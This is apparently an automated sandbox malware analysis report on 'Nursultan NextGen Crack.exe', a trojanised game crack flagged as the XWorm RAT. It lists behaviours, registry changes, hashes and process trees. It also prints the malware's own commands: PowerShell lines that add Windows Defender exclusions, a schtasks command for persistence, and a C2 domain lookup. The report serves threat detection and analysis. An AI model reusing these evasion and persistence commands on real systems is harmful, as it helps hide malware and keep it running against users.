Malware Analysis Report

2024-09-23 03:39

Sample ID 240625-py935szhpd
Target Nursultan NextGen Crack.exe
SHA256 e766bc3bd8513eadc0d54e511049f1d35bc5c503aeef6cd38aa500d39d66da11
Tags
xworm execution persistence rat trojan discovery evasion privilege_escalation upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e766bc3bd8513eadc0d54e511049f1d35bc5c503aeef6cd38aa500d39d66da11

Threat Level: Known bad

The file Nursultan NextGen Crack.exe was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan discovery evasion privilege_escalation upx

Xworm

Detect Xworm Payload

Contains code to disable Windows Defender

Downloads MZ/PE file

Boot or Logon Autostart Execution: Active Setup

Modifies Windows Firewall

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Checks computer location settings

Loads dropped DLL

Enumerates connected drives

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Event Triggered Execution: Accessibility Features

Command and Scripting Interpreter: JavaScript

Opens file in notepad (likely ransom note)

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: GetForegroundWindowSpam

NTFS ADS

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Kills process with taskkill

Suspicious behavior: LoadsDriver

Modifies registry class

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-25 12:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-25 12:45

Reported

2024-06-25 12:50

Platform

win10v2004-20240508-en

Max time kernel

250s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\wininit" C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3292 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3292 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3292 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 3188 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3188 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3188 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 3188 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2140 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe
PID 2140 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\и.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\choice.exe

choice /c 12 /n /m "Enter your choice:"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\wininit'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\Admin\wininit"

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WatchSplit.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\MergeRestart.js"

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\MergeRestart.js

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 seems-poet.gl.at.ply.gg udp

Files

memory/3292-0-0x00000000008F0000-0x000000000092A000-memory.dmp

memory/3292-1-0x00007FFF98773000-0x00007FFF98775000-memory.dmp

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

MD5 a9aee64b701db5f8cfc3c963872403b4
SHA1 48079f6822d84ea354f301cdb97d2ecb59552e06
SHA256 f46d7ae8973b42a0cb892c6aa8d6a559b4cc1d0c67b1d5df3072c4f7f77b53fb
SHA512 696e745d488841c3b1a55a350d754b69a1d6b0d83fd9eac247229239951b12bfd98d8cbbcbfffd567966495a10950040edd77398702763071f6eeb50f13a3a1e

memory/2140-17-0x00000000005C0000-0x00000000005E6000-memory.dmp

memory/2140-18-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

C:\Users\Admin\AppData\Roaming\и.bat

MD5 9885bc1f632421f329efe28818361344
SHA1 9d0838fa885728361703a6e2b36e2aa3603b05ce
SHA256 6a218880f23edb2a809ee20919f355f80ef4a0b545c3d79ffa8c848441eced7a
SHA512 ddb5252457e9e02a91073f58662cd2eb72d670827f5173e8705c9e41d55a4ba4efdab80f24371ff61573d250f7b8463ce05f9cec7c48085dcacd38cd21e65203

memory/2300-25-0x00000289A9590000-0x00000289A95B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfvx4tse.1l4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce4540390cc4841c8973eb5a3e9f4f7d
SHA1 2293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA512 2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b4b6d4cc52b5a3a71149b1f33d94d5de
SHA1 97d3dbdd24919eab70e3b14c68797cefc07e90dd
SHA256 da8c02ce00d5b1e6d4c3667465c7bbc14d7cd5227eb634f3d9690afd488267fe
SHA512 fc894f03709b83df7d2fca2779e1e60549078b67bcdbff0b61c8e5a802982210ae971309c1f92577573299288963ab5c95c6b38cbaedf53dc6062812c57a97af

memory/2140-67-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/2140-73-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/2140-74-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wininit.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-25 12:45

Reported

2024-06-25 12:53

Platform

win11-20240611-en

Max time kernel

454s

Max time network

471s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\wininit" C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\M: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\R: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\T: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\O: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-QTQH4.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-2270U.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-5ND24.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storelib.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-MTDM0.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-DGQ5J.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-8PSUO.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_update.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-AKF77.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-R2GFH.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-TAAOO.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\afaapi.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-8QQOL.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-2GGC8.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-DAMG5.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-QTSA4.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-9E19P.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-12EMA.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-SEI7M.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-4GVUQ.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-6BD5A.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-S4FOG.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-2GMLC.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storarc.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-AKDGR.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\ROGAIOSDK.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-E2EJM.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-U7L2M.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-BF063.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-EM1DK.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-T08UO.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-ROQKI.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
